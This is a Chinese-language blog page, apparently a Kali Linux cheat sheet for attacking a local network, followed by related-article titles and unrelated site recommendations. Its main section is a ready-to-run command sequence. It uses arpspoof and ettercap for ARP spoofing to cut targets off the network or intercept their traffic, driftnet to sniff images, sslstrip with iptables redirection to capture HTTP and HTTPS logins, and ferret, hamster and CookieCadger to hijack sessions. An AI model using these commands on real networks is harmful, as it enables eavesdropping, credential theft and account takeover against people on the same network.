1.查看局域网中的主机

fping –asg 192.168.1.0/24

2.断网

arpspoof -i wlan0 -t 192.168.100 192.168.1.1

(arpspoof  -i 网卡 -t 目标IP 网关)

3.流量劫持

echo 1 >/proc/sys/net/ipv4/ip_forward

(echo空格1空格>)

arpspoof -i wlan0 -t 192.168.100 192.168.1.1

4.图片嗅探

(1)方法1(实验不成功)

echo 1 >/proc/sys/net/ipv4/ip_forward

arpspoof -i wlan0 -t 192.168.100 192.168.1.1

driftnet -i wlan0

(原因分析:可能丢包原因吧)

(2)方法2(成功)

sudo ettercap -i wlan0  -T -M arp:remote /192.168.1.253//192.168.1.100/

driftnet -i wlan0

(图片文件夹:/tmp/driftnet)

Ubuntu下可以安装工具:

sudo apt-get install  ettercap-text-only

sudo apt-get install driftnet

5.http登录账号密码嗅探

echo 1 >/proc/sys/net/ipv4/ip_forward

arpspoof -i wlan0 -t 192.168.100 192.168.1.1

ettercap -Tq -i wlan0

(信息太庞杂,可以使用 ettercap -Tq -i wlan0 >test方便查找)

6.https登录账号密码嗅探

vim /etc/ettercap.conf

# if you use iptables:

#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

修改为

# if you use iptables:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

sslstrip -a -f -k

echo 1 >/proc/sys/net/ipv4/ip_forward

arpspoof -i wlan0 -t 192.168.100 192.168.1.1

ettercap -Tq -i wlan0

7.会话劫持

(1)方法1

arpspoof

wireshark        -->抓包

ferret         --。重新生成抓包后的文件

hamster       -- > 重放流量

$echo 1 >/proc/sys/net/ipv4/ip_forward

$arpspoof -i wlan0 -t 192.168.100 192.168.1.1

$wireshark

wireshark 保存为.pcap文件

$ferret -r cookie.pcap

将生成的txt文件放到用户目录下

$hamster

配置代理

访问127.0.0.1:1234(上一步的代理)

(2)方法2

$echo 1 >/proc/sys/net/ipv4/ip_forward

$arpspoof -i wlan0 -t 192.168.100 192.168.1.1

$ferret -i wlan0

$hamster

(3)方法3

$echo 1 >/proc/sys/net/ipv4/ip_forward

$arpspoof -i wlan0 -t 192.168.100 192.168.1.1

CookieCadger-1.08.jar

局域网-断网&劫持(kali)的更多相关文章

  1. Kali下进行局域网断网攻击

    今天我就来演示一下在kali下的局域网断网攻击,即ARP地址欺骗,下图所要用到的arp地址欺骗状态图: 则: 第一步:假设主机A访问某网站,那么要告知某网站我的IP和MAC地址,但这是以广播的方式告知 ...

  2. ARP攻击之Kali Linux局域网断网攻击

    特别声明: 我们学习研究网络安全技术的目的应是为了维护网络世界的安全,保护自己和他人的私有信息不被非法窃取和传播.请您遵守您所在地的法律,请勿利用本文所介绍的相关技术做背离道德或者违反法律的事情. S ...

  3. ARP局域网断网攻击

    Kali--ARP局域网攻击 什么是ARP? ARP ( Address Resolution Protocol)地址转换协议,工作在OSI模型的数据链路层,在以太网中,网络设备之间互相通信是用MAC ...

  4. 用kali执行arp攻击-----------使对方断网

    实现原理 其主要原理是局域网内的"攻击机"通过冒充同网络号下的"受害者主机"的物理地址(mac地址),通过欺骗网关,让网关原来应该发给"受害者主机&q ...

  5. arp断网攻击

    arp断网攻击可以是同局域网内主机无法上网!(可恶搞室友哦,嘻嘻!) 实现原理 arp的中文释义是地址解析协议,全英文 address resolution protocol,是一个将局域网IP地址映 ...

  6. linux 断网 扫描基本命令

    kali使用arpspoof命令进行ARP欺骗. 做法是获取目标主机IP镜像流量,再进行ARP欺骗. 此次测试实在局域网中进行,使用kali虚拟机和Windows10物理机测试. 最终效果是利用kal ...

  7. ARP欺骗-断网小技巧

    警告:请勿用于非法用途,后果自负! 环境: 攻击方: Kali Linux 被攻击方: Windows XP 二者在同一局域网下 步骤 1.查看Windows的IP,联网状态 在Windows的cmd ...

  8. arp断网攻击解决办法

    局域网中有这个提示arp断网攻击是正常的,说明防火墙已经拦截了,是有人用P2P工具控制你的网速,或者是局域网有机器中病毒了也会有这样的提示,不过不用担心,今天给大家带来几个防止arp断网攻击的办法,希 ...

  9. “HK”的日常之ARP断网攻击

    ARP断网攻击是什么?可以吃吗?如果可以吃它好吃吗? ARP断网攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响 ...

随机推荐

  1. 【C/C++】static关键字

    首先static的最主要功能是隐藏,其次因为static变量存放在静态存储区,所以它具备持久性和默认值0. static性质 隐藏 当同时编译多个文件时,未加static前缀的全局变量和函数都具有全局 ...

  2. MySQL的简单概念及软件安装

    数据库的简介 一.数据库的基本概念:数据.数据库.数据库管理系统.数据库系统 数据:数据(Data)是用来记录信息的可识别符号,是信息的具体表现形式. 数据库:(1)数据库(Database,DB)是 ...

  3. 在windbg调试会话中查找.NET版本

    如何在调试会话中找到调试对象中使用的.NET运行时版本?以自动/脚本方式,不使用调试器扩展或符号? 答案: !for_each_module .if ( ($sicmp( "@#Module ...

  4. AGC010

    AGC010 A [过水已隐藏] B 这题推完了还是不会/kk真的毒瘤 考虑每次会减少的总和是\(n(n+1)/2\),用原来的和除以这个可以得到操作次数\(m\)(不是整数无解) 再考虑相邻两个数\ ...

  5. 可持久化0-1Trie树

    我跟可持久化数据结构杠上了 \(QwQ\) .三天模拟赛考了两次可持久化数据结构(主席树.可持久化0-1Trie树),woc. 目录: 个人理解 时空复杂度分析 例题及简析 一.个人理解 可持久化0- ...

  6. Golang 位向量

    位图 位图(Bitmap)是通过一个 bit 来表示某个元素对应的值或者状态.它并不是什么新的数据结构.它的内容其实就是普通的字符串. 在redis中,我们可以通过 get/set 获取位图的内容,也 ...

  7. 分布式id的生成方式——雪花算法

    雪花算法是twitter开源的一个算法. 由64位0或1组成,其中41位是时间戳,10位工作机器id,12位序列号,该类通过方法nextID()实现id的生成,用Long数据类型去存储. 我们使用id ...

  8. 责任链模式(chainOfResponsibility)

    参考文章:http://wiki.jikexueyuan.com/project/design-pattern-behavior/chain-four.html 定义: 使多个对象都有机会处理请求,从 ...

  9. [Beta阶段]第八次Scrum Meeting

    Scrum Meeting博客目录 [Beta阶段]第八次Scrum Meeting 基本信息 名称 时间 地点 时长 第八次Scrum Meeting 19/05/14 大运村寝室6楼 25min ...

  10. centos上传命令

    首先安装lrzsz # yum -y install lrzsz 1.上传文件,执行命令rz,会跳出文件选择窗口,选择好文件,点击确认即可. # rz 运行rz命令后弹出选择文件窗口,找到要上传的文件 ...